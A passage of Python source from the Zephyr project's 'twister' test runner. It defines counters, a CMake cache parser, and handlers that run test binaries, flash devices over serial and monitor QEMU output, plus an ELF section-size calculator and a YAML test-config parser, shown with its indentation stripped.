import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
self.terminated = False
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def add_missing_testscases(self, harness):
"""
If testsuite was broken by some error (e.g. timeout) it is necessary to
add information about next testcases, which were not be
performed due to this error.
"""
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
def _set_skip_reason(self, harness_state):
"""
If testcase written in ztest framework is skipped by "ztest_test_skip()"
function, then such testcase is marked in instance.results dict as
"SKIP", but reason of this sipping still "Unknown". This method pick up
this situation and complete the instance.reason properly.
"""
harness_state_pass = "passed"
harness_testcase_result_skip = "SKIP"
instance_reason_unknown = "Unknown"
if harness_state == harness_state_pass and \
self.instance.reason == instance_reason_unknown and \
harness_testcase_result_skip in self.instance.results.values():
self.instance.reason = "ztest skip"
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.add_missing_testscases(harness)
self._set_skip_reason(harness.state)
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or not (d.serial or d.serial_pty):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
out_state = "flash_error"
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state in ["timeout", "flash_error"]:
self.add_missing_testscases(harness)
if out_state == "timeout":
self.instance.reason = "Timeout"
elif out_state == "flash_error":
self.instance.reason = "Flash error"
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
# sometimes a test instance hasn't been executed successfully with an
# empty dictionary results, in order to include it into final report,
# so fill the results as BLOCK
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
self._set_skip_reason(harness.state)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler.record(harness)
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.add_missing_testscases(harness)
self._set_skip_reason(harness.state)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
